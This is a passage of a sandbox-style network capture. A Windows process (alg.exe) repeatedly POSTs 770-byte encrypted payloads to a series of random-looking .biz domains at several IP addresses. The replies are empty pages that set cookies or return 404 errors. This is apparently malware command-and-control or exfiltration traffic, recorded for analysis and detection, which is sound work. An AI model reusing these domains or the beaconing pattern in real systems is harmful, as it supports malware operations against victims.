Jan 10, 2025 16:02:08.124880075 CET	770	OUT	Data Raw: b8 9b 5a 57 61 2d 3d 22 f6 02 00 00 76 36 6c e5 21 f6 01 e6 9d cd 68 36 b5 a2 42 97 75 63 a6 9b 6a 3a 43 79 6d 88 a4 75 5f da 85 3e e3 6c 08 1c e8 4e 99 36 b5 77 f3 4c 35 4e 5e d8 65 81 cf 05 34 27 32 f6 09 bc cd 87 4f c5 d1 9f ec 09 6a ca bf ea Data Ascii: ZWa-="v6l!h6Bucj:Cymu_>lN6wL5N^e4'2Ojb`']n+kuxZ73=!<,DtX6\|*,q;:"D[Pt1gR3I"1vs v2XE;(i;#nmgH(4
Jan 10, 2025 16:02:08.801150084 CET	170	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:08 GMT Content-Length: 94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Jan 10, 2025 16:02:08.844695091 CET	343	OUT	POST /bc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: myups.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:08.844722986 CET	770	OUT	Data Raw: e1 87 c5 6b 8a 6d b1 0b f6 02 00 00 c5 ea 8f 82 23 6f 0d 4a 33 c5 22 dd 9c c9 27 97 42 3a 2d 95 56 be ee bf b9 95 e1 3c 53 62 2b f2 42 c4 06 f4 8e 32 7f 9c aa 9e 6a e4 46 64 2b 11 b2 62 c2 56 9e 57 86 d8 86 a4 54 5c d2 c9 6c 1b 75 46 30 50 32 29 Data Ascii: km#oJ3"'B:-V<Sb+B2jFd+bVWT\luF0P2)G9E4+fn6#$?;wX$A::;dOSs^V@f _C2>Rivt-5N0^E8*e.NDLrBy,ZhE3n&-;ge?lU<T
Jan 10, 2025 16:02:09.056545973 CET	189	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:08 GMT Content-Length: 94 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49805	54.244.188.177	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:09.302539110 CET	347	OUT	POST /li HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: oshhkdluh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:09.302563906 CET	770	OUT	Data Raw: 3f fa b5 f2 60 5b 87 d8 f6 02 00 00 66 8d 8f 58 ef 42 e8 2e 5e a9 69 4e 4f db 78 1a a1 77 04 92 6b 64 f4 c9 ae 19 8c 0c f2 e2 e4 fa 5e 15 de 9d 64 d3 91 f1 9f 70 32 d0 03 e4 9a b2 91 a0 f8 87 63 50 0d db bd e8 3b 72 ef 06 be e6 a2 64 d0 c0 f3 f1 Data Ascii: ?`[fXB.^iNOxwkd^dp2cP;rdy/8OB E#&\|a#_5U#F~(,'D8J=wtI8.jINsZ.P={\|9NHqfg-tr<,0gWzYzgk-~c@xw_D
Jan 10, 2025 16:02:10.025219917 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f0320e3141a29fd12a9e9f2c80915af3\|8.46.123.189\|1736521329\|1736521329\|0\|1\|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49813	208.117.43.225	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:10.278723001 CET	345	OUT	POST /ev HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:10.278738976 CET	770	OUT	Data Raw: 18 91 7b 2d 75 74 24 7c f6 02 00 00 1b 39 71 c4 56 fd bd 67 de be e8 13 e6 21 77 1d b0 19 0d 3a bd 20 cd 34 45 43 20 06 94 7c f2 0f a8 8e ce c2 36 87 00 19 45 c0 4b cd 87 c2 d3 fa 8a 7f d0 25 68 d9 ed 61 5c 2c 08 0c 7b 55 3d 9f c9 39 d3 53 1d 87 Data Ascii: {-ut$\|9qVg!w: 4EC \|6EK%ha\,{U=9SZicaCzzV{e\K/l~z}Ez:$nshUfuO(?tDSBC6+}sI`plGqU))jDHa^M@$Ce%~fu6[qCq
Jan 10, 2025 16:02:10.761368036 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 10 Jan 2025 15:02:10 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jan 10, 2025 16:02:10.789216995 CET	354	OUT	POST /vtneffnnlgu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:10.789253950 CET	770	OUT	Data Raw: aa 56 2b cc 7b ee 84 a1 f6 02 00 00 44 47 3d 5c 00 20 3e 38 c6 94 2a f9 92 79 f2 ba 49 ff 48 6b 00 02 be fd 8d f1 2d 56 6e ba 1b 21 5e 30 6e 0c 36 50 07 01 b8 4d 10 f7 e9 bc 2f d5 27 e7 68 e4 ca aa 44 6e 31 01 26 ad 93 d3 f3 b9 b5 e7 7b b2 ab d1 Data Ascii: V+{DG=\ >8*yIHk-Vn!^0n6PM/'hDn1&{xtfmD!~RQ3Z2e,Q-bO=BfsMIwdc/>7fKxu+3Muus]/OfP?T6Av~d=QUd"r
Jan 10, 2025 16:02:10.902580976 CET	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 10 Jan 2025 15:02:10 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49820	18.246.231.120	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:11.091665983 CET	345	OUT	POST /xvgc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:11.091694117 CET	770	OUT	Data Raw: d6 33 9e c9 36 96 2d 32 f6 02 00 00 55 f5 6b 2b d4 57 f5 4a 92 fe a0 b7 ce fa a2 8d c0 e7 ad 71 bb f8 8d 47 c9 20 28 3d 84 1d 1e 69 04 60 4b cc 76 36 75 f6 66 d5 8c 8b 21 21 db e6 a3 8c 21 5b 01 58 95 df db 6a 47 69 64 5c f3 56 a3 95 9d 8c c8 1a Data Ascii: 36-2Uk+WJqG (=i`Kv6uf!!![XjGid\VZk SL0]\|wT&I4(5a@rp=z]L<(("5f8VN)Lxn;vY4&{A^p+[nwA!ex%/hU%j
Jan 10, 2025 16:02:12.544719934 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=8b7014ba5c590a4871190df5c3c645db\|8.46.123.189\|1736521331\|1736521331\|0\|1\|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 10, 2025 16:02:12.544821024 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=8b7014ba5c590a4871190df5c3c645db\|8.46.123.189\|1736521331\|1736521331\|0\|1\|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 10, 2025 16:02:12.545064926 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=8b7014ba5c590a4871190df5c3c645db\|8.46.123.189\|1736521331\|1736521331\|0\|1\|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49828	54.244.188.177	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:13.017987013 CET	352	OUT	POST /tbbwyfgx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:13.018007994 CET	770	OUT	Data Raw: d7 69 8f 76 e8 8d 5f 99 f6 02 00 00 9b 46 46 bc 0c fa 23 57 2c 86 2f 9c 41 60 c4 db 2c 86 a3 b1 59 54 3e 75 94 8d 84 5a 0a 44 0e 4a 52 0a 78 40 81 7f a1 cb 0c c6 b6 7e 7c f9 63 61 28 af d3 dd ba e8 89 04 63 43 fa a7 12 88 dd 90 84 fd 80 2d 83 dd Data Ascii: iv_FF#W,/A`,YT>uZDJRx@~\|ca(cC-46soA:Z"(N#5'$ytxO=7B+IA"e;v\-[?qqOth{&[HG')="PM
Jan 10, 2025 16:02:13.733278036 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=8381d4ca11c6a6fd47a89f73a0e0b3ec\|8.46.123.189\|1736521333\|1736521333\|0\|1\|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49835	18.141.10.107	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:14.174266100 CET	349	OUT	POST /pfrsud HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:14.174266100 CET	770	OUT	Data Raw: e1 97 d3 3c 18 eb 29 79 f6 02 00 00 7f a6 0b 45 e1 87 54 64 15 52 de ec 7a 4a 57 89 f5 d9 6d da 7a 1c 19 69 6d 4d d7 4b 07 40 a5 a1 9d e5 16 a1 34 0d b7 da 21 88 2e 76 cb 38 df 93 28 1b 6f ff 90 a9 d1 27 89 ec d1 25 6c 86 22 3a f7 e5 fc 86 5b bd Data Ascii: <)yETdRzJWmzimMK@4!.v8(o'%l":[OI\qE17scSAb&2hNLC^ui"ScwKz.ItP5!]<E>>d&{w% \w[)B?GHGx*#w0CC
Jan 10, 2025 16:02:15.544652939 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=9d832c7458f7fb59112327b4deb6c11e\|8.46.123.189\|1736521335\|1736521335\|0\|1\|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49845	34.227.7.138	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:15.745142937 CET	342	OUT	POST /g HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gnqgo.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:15.745143890 CET	770	OUT	Data Raw: 1a 11 8c eb 8d d6 1b e0 f6 02 00 00 39 61 5d 4b 53 79 c5 1c 0e b2 bb 79 d7 f3 8f 8d 01 b1 fa b6 db 64 7b 80 5d 66 13 c3 f4 9d 84 76 80 da a5 00 6f 03 85 f9 f4 2d 3f a7 b4 5e 42 ea 56 64 70 f1 e4 5d a1 10 7f be d4 be bc 64 26 6c 65 57 33 64 f0 36 Data Ascii: 9a]KSyyd{]fvo-?^BVdp]d&leW3d6RBya_9;Q,#?CO!U%nQcvD\|S\LF]q'UD${`c=q>r5vad,<+y5EaXr[J;;U v
Jan 10, 2025 16:02:16.225922108 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=2a3a8db47d9b7664d9c65e6126d6923a\|8.46.123.189\|1736521336\|1736521336\|0\|1\|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49851	44.221.84.105	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:16.461719036 CET	360	OUT	POST /lkvkqbtwklkptpvq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jhvzpcfg.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:16.461735010 CET	770	OUT	Data Raw: 8e 64 54 dd 26 d1 b0 23 f6 02 00 00 72 bd eb a2 37 3b b3 41 7e 6d 6b e9 ac 0f 16 07 02 8c 3d 41 14 46 86 8f a2 ed 2a 37 18 b5 b0 16 dc 61 b5 39 92 93 20 1c ae db 73 75 a6 6b c3 5e 21 12 a6 30 6a 12 85 02 be a9 75 63 d4 9c 0a fc 72 48 1e 8e 01 44 Data Ascii: dT&#r7;A~mk=AF7a9 suk^!0jucrHDE}I#z}x(WKU%Rn5\|KAA9<s{&%ww%4"'tP/nsoXQeJ>R@{HFv3oZ=@<YLCBAmg[@R)2\|Gy
Jan 10, 2025 16:02:16.923989058 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=286e39bb7d0c1561cbd3380b199e894b\|8.46.123.189\|1736521336\|1736521336\|0\|1\|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49857	18.141.10.107	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:17.269864082 CET	360	OUT	POST /dlpuagspsbxejxau HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:17.269895077 CET	770	OUT	Data Raw: 38 62 65 8e 6b fb 47 1b f6 02 00 00 1d bd 07 d5 7e 09 ff f9 24 fa 2f ec ec dc 41 fd 26 f8 00 17 20 78 0e 0c 2b dc 59 1e 08 13 6a 23 03 bf 17 eb 9c 46 03 35 4c 34 98 2e 7e 77 dd 96 39 40 22 b1 9a de 87 8e fc 91 85 25 fd d3 5e 95 9d e1 c9 86 e4 43 Data Ascii: 8bekG~$/A& x+Yj#F5L4.~w9@"%^CfDKyOjF),T_;gs1mqF0H/}dJX1zwZ2cYeGHGh!5}AS1yEj5<]04_\|{~YLiM bQmrz
Jan 10, 2025 16:02:18.715440989 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0130ff4e8fb97a142666a9c2b3a7ffe1\|8.46.123.189\|1736521338\|1736521338\|0\|1\|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49869	18.246.231.120	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:19.032044888 CET	353	OUT	POST /eqmwmfvyliwj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vyome.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:19.032044888 CET	770	OUT	Data Raw: 07 02 d8 b1 02 ac 4c 45 f6 02 00 00 25 23 a8 ca 4f ae 6f 06 c7 91 8f 32 d4 fc 63 14 e5 1b 6f 56 87 d3 65 a1 45 08 33 ff 08 f5 89 55 76 3a 9d 96 a6 eb 62 46 ac a9 d1 55 19 e6 bf 06 78 e3 71 c8 9a 13 f5 a8 ad d8 ee 40 ed aa 6e d5 81 a0 3e 63 e2 fb Data Ascii: LE%#Oo2coVeE3Uv:bFUxq@n>cV?E[NSDe]VTJ1nz.vDfz{}=1`N*Ad"9+,2JQo'bF16WlCi4%RaN.fK8D
Jan 10, 2025 16:02:19.782983065 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=4a1cb10a3e172a5f3cb1b0113f1e6c19\|8.46.123.189\|1736521339\|1736521339\|0\|1\|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49878	34.227.7.138	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:20.050456047 CET	359	OUT	POST /oaickrbplfmnmgg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yauexmxk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
Jan 10, 2025 16:02:20.050570011 CET	770	OUT	Data Raw: 11 63 59 e3 76 d9 48 64 f6 02 00 00 23 cc 91 5a 00 e9 36 be 6b 9b df 54 d9 a4 45 c5 c8 2f 97 15 19 91 16 d3 4c 41 ef 2c 12 2d 36 2b fd a6 ef a4 21 a1 78 3d 6d 7a 24 5c 90 90 ee db a1 24 27 a5 0b e6 fb ba 57 85 47 6a 22 5f da 4f 86 ce 8a 6e e9 c7 Data Ascii: cYvHd#Z6kTE/LA,-6+!x=mz$\$'WGj"_OntxMhH$jx^s{n,`%%y(Y#4x(%nHv6DaLd`38N*ExxJf
Jan 10, 2025 16:02:20.523746967 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 15:02:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e2b65e875b1cff6743727f10fde756e4\|8.46.123.189\|1736521340\|1736521340\|0\|1\|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49884	13.251.16.150	80	5084	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:20.805680990 CET	354	OUT	POST /uamucyonicsu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 770
